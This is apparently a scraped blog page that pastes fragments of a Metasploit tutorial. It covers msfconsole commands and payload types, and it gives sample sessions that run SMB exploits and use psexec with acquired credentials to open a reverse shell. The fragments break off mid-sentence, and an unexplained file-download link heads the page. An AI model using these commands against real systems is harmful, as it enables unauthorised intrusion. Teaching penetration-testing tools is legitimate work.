HackoneTechnology

http://www.sendspace.com/file/26k4ed

Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to msfconsole. msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index msf exploit( ms09_050_smb2_negotiate_func_index ) > help ...snip... Exploit Commands ================ Command Description ------- ----------- check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable rexploit Reloads the module and launches an exploit attempt msf exploit( ms09_050_smb2_negotiate_func_index ) > Show Using an exploit also adds more options to the 'show' command. Targets msf exploit( ms09_050_smb2_negotiate_func_index ) > show targets Exploit targets: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) Payloads msf exploit( ms09_050_smb2_negotiate_func_index ) > show payloads C

Payloads There are three different types of payload module types in Metasploit: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. Whether or not a payload is staged, is represented by '/' in the payload name. For example, "windows/shell_bind_tcp" is a single payload, with no stage whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell). Singles Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe. Stagers Stagers setup a network connection between the attacker and victim and are designed to be small and reliable. It is difficult to always do both of these well so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one

All exploits in the Metasploit Framework will fall into two categories: active and passive. Active Exploits Active exploits will exploit a specific host, run until completion, and then exit. Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered. You can force an active module to the background by passing '-j' to the exploit command: msf exploit( ms08_067_netapi ) > exploit -j [*] Exploit running as background job. msf exploit( ms08_067_netapi ) > Example The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system. msf > use exploit/windows/smb/psexec msf exploit( psexec ) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit( psexec ) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit( psexec ) > set LHOST 192.168.1.5 LHOST => 192.168.

Msfconsole Commands The msfconsole has many different command options to chose from. back Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally. msf auxiliary( ms09_001_write ) > back msf > check There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it. msf exploit( ms08_067_netapi ) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 172.16.194.134 yes